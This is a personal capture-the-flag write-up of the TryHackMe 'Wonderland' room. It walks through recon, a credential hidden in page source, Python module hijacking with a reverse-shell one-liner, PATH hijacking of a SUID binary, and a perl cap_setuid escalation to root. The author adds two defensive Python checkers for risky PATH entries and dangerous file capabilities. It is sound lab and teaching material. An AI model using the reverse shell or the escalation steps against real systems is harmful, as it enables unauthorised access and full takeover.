Try it yourself here: TryHackMe | Wonderland
Enter Wonderland and capture the flags.
DAD NOTICE: I'm a dad with a full-time job. You'll likely see changes in IPs and possibly screens of the systems I'm using. This is because it's very rare I get more than a few minutes here and there to do this, so I pick it up through the week... or I got stuck and it's taken me days to figure it out.
Okay, so as always we start with an nmap scan, showing us an SSH port and an HTTP server using Golang.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-20 17:40 EST
Nmap scan report for 10.10.235.15
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8eeefb96cead70dd05a93b0db071b863 (RSA)
| 256 7a927944164f204350a9a847e2c2be84 (ECDSA)
|_ 256 000b8044e63d4b6947922c55147e2ac9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
The website isn't anything fancy and there's nothing hidden in the source code. There's no robots file either. All we're provided with is an image.
In fact, we can see all the images if we go here:
http://10.10.235.15/img/
Well, let's follow the suggestion and follow the white rabbit... sheesh, I'm feeling very Neo right now. We download the white_rabbit_1.jpg file and check the contents of it with steghide.
$ steghide info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
$ cat hint.txt
follow the r a b b i t
Ok.... I did that... oddly spaced rabbit though... What's interesting, though, is that the gobuster I was running while working on this shows a folder that piques my interest.
$ gobuster dir -u http://10.10.235.15 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-bi
<snip...>
/img (Status: 301) [Size: 0] [--> img/]
/r (Status: 301) [Size: 0] [--> r/]
/poem (Status: 301) [Size: 0] [--> poem/]
/http%3A%2F%2Fwww (Status: 301) [Size: 0] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 0] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 0] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 0] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 0] [--> /%2A%2Ahttp:/www]
We're on the right track.
We follow that folder structure all the way through to get to the final page, which shows us the final PNG image of Alice.
Now if we do a view source on this page we see something hidden:
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:[REDACTED]</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
Doing a bit of research I find that this poem is about deception and predication. It's also voiced by Richard Haydn, the caterpillar in the Alice movie. Speaking of poems, it looks like our gobuster has found a sub-folder for that too. Visiting that page gives us a poem about the Jabberwocky, another poem from the movie by Lewis Carroll (yeah that's right... I don't read... only watch). At this point in the CTF I'm feeling very much like Alice: "Somehow it seems to fill my head with ideas—only I don't exactly know what they are!"
OK, well that first find kinda looks like a username:password combo, so I'll try it on the SSH port. Bingo.
$ ssh alice@10.10.235.15
<snip...>
alice@10.10.235.15's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
<snip...>
alice@wonderland:~$
There is a BUNCH of interesting stuff right out of the gate. First, we see the root flag, but of course we don't have access. Next, we see a Python script called "walrus_and_the_carpenter.py"... but is this something to get us root?
alice@wonderland:~$ ls -la
<snip...>
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
The hint for this room is about being upside down... well, if the root.txt file is here, perhaps the user.txt file is in /root? We don't have access to list files, so let's just go for it:
cat /root/user.txt
[ REDACTED ]
OK, well now we need to escalate some privileges. Let's check for sudo permissions on this little girl.
alice@wonderland:/$ sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
OK, so here's what we're going to do. If we cat out that walrus script, we see it imports the random module. Using some ideas from this page: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/ we're going to create our own random.py file in our home directory (Python searches the directory the script lives in, here alice's home, before the standard library, so our file shadows the real module) and give it a reverse shell script.
import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
Then we run a listener to catch it as rabbit.
nc -lvnp 4444
Lastly, we run the Python script as rabbit.
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Doing a listing of the rabbit's home folder... there's an SUID binary there. Running it gives us a notice that the Mad Hatter should be here soon.
If we use xxd to view the binary, we can see that it's calling the date command to give a time an hour ahead for meeting the Hatter.
OK, so because date isn't being called with an absolute path, we can add the tmp directory to our PATH and run our own version of it. We'll use this page as our template: https://systemweakness.com/linux-privilege-escalation-using-path-variable-manipulation-64325ab05469 First we add tmp to our PATH.
rabbit@wonderland:/home/rabbit$ export PATH=tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Now we create our own shell script and set the file to executable. Here's the "binary" we're going to make:
rabbit@wonderland:/home/rabbit$ echo /bin/bash > /tmp/date
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ whoami
whoami
hatter
hatter@wonderland:/home/rabbit$
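The same lookup order written out, so you can see exactly why a writable directory early in PATH hands control of date to whoever fills it, and why a relative entry like tmp really means ./tmp. This is my added example, not code from the room or the write-up; the planted date script and the temporary directory holding it are constructed.

```python
import os
import stat
import tempfile


def resolve_command(name, path_entries, cwd):
    """Mimic the PATH search a shell or system() performs: return the first
    executable <entry>/<name>. A relative entry such as 'tmp' is resolved
    against cwd, so it means ./tmp rather than /tmp."""
    for entry in path_entries:
        candidate = os.path.join(cwd, entry or ".", name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return os.path.normpath(candidate)
    return None


def risky_path_entries(path_entries):
    """Flag PATH entries an unprivileged user could use to plant a binary:
    relative or empty entries, and directories that are world-writable or
    missing (anyone able to mkdir there later fills the slot)."""
    findings = []
    for entry in path_entries:
        if not os.path.isabs(entry):
            findings.append((entry, "relative entry, resolved against cwd"))
            continue
        try:
            mode = os.stat(entry).st_mode
        except FileNotFoundError:
            findings.append((entry, "does not exist"))
            continue
        if mode & stat.S_IWOTH:
            findings.append((entry, "world-writable"))
    return findings


def demo():
    """Constructed scenario: a planted 'date' in a world-writable directory
    that precedes the system directories, plus a relative 'tmp' entry."""
    with tempfile.TemporaryDirectory() as d:
        planted = os.path.join(d, "date")
        with open(planted, "w") as f:
            f.write("#!/bin/sh\necho planted\n")
        os.chmod(planted, 0o755)
        os.chmod(d, 0o1777)  # mimic /tmp permissions
        path = ["tmp", d, "/usr/bin", "/bin"]
        resolved = resolve_command("date", path, cwd=d)
        reasons = [why for _, why in risky_path_entries(path)]
        return {"planted_dir_won": os.path.dirname(resolved) == d,
                "reasons": reasons}
```

A SUID or capability-bearing program that calls helpers by bare name inherits whatever PATH its caller chose; calling /bin/date by absolute path, or resetting PATH before system(), removes this whole class of bug.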
We still can't read the root flag yet, and we can't run sudo -l because we don't know the hatter's password. There is, however, a password file in the home directory.
hatter@wonderland:/home/hatter$ ls -la
<snip...>
-rw------- 1 hatter hatter 29 May 25 2020 password.txt
hatter@wonderland:/home/hatter$ cat password.txt
[ REDACTED ]
Well, let's try sudo -l... nope. Can't run ANYTHING on this box. Okie dokie... well... let's go back through our list of privesc techniques. Looks like we have a winner with capabilities. First we search for the list of files with cap_setuid set, and then using GTFOBins we find the command to run to get a new shell.
hatter@wonderland:~$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami
root
# cat /home/alice/root.txt
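To turn the getcap check above into something a defender can run routinely, here's an added example of mine (not from the room or the write-up) that parses getcap -r output and flags binaries whose file capabilities let a process become root. The three perl/mtr-packet lines are the room's own output; the /opt/constructed paths are made-up sample lines covering the newer libcap output layout.

```python
import re

# Capabilities that by themselves let a process become root or bypass file
# permission checks; cap_setuid is the one abused above via perl.
ESCALATING_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}

# The three lines from this room's `getcap -r /`, plus two constructed lines
# in the newer libcap layout (`path caps=flags`): one with a comma-separated
# capability set and one with a permitted-only capability.
SAMPLE_GETCAP = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/opt/constructed/netmon cap_net_admin,cap_net_raw=ep
/opt/constructed/backup cap_dac_read_search+p
"""

LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>[a-z_,]+)(?P<flags>[+=][eip]+)$")


def parse_getcap(text):
    """Parse getcap output into (path, {caps}, {flags}) tuples, accepting the
    old `path = caps+flags` and the newer `path caps=flags` layouts."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        caps = set(m.group("caps").split(","))
        flags = set(m.group("flags")[1:])
        entries.append((m.group("path"), caps, flags))
    return entries


def escalation_risks(text):
    """Return {path: sorted dangerous caps} for binaries whose permitted set
    holds an escalating capability. +ep is live on exec; +p alone still
    counts, since the program can raise it into its effective set itself."""
    risks = {}
    for path, caps, flags in parse_getcap(text):
        dangerous = caps & ESCALATING_CAPS
        if dangerous and "p" in flags:
            risks[path] = sorted(dangerous)
    return risks
```

Running this against a baseline from a freshly installed host and alerting on new entries catches exactly the perl = cap_setuid+ep situation this box was built around.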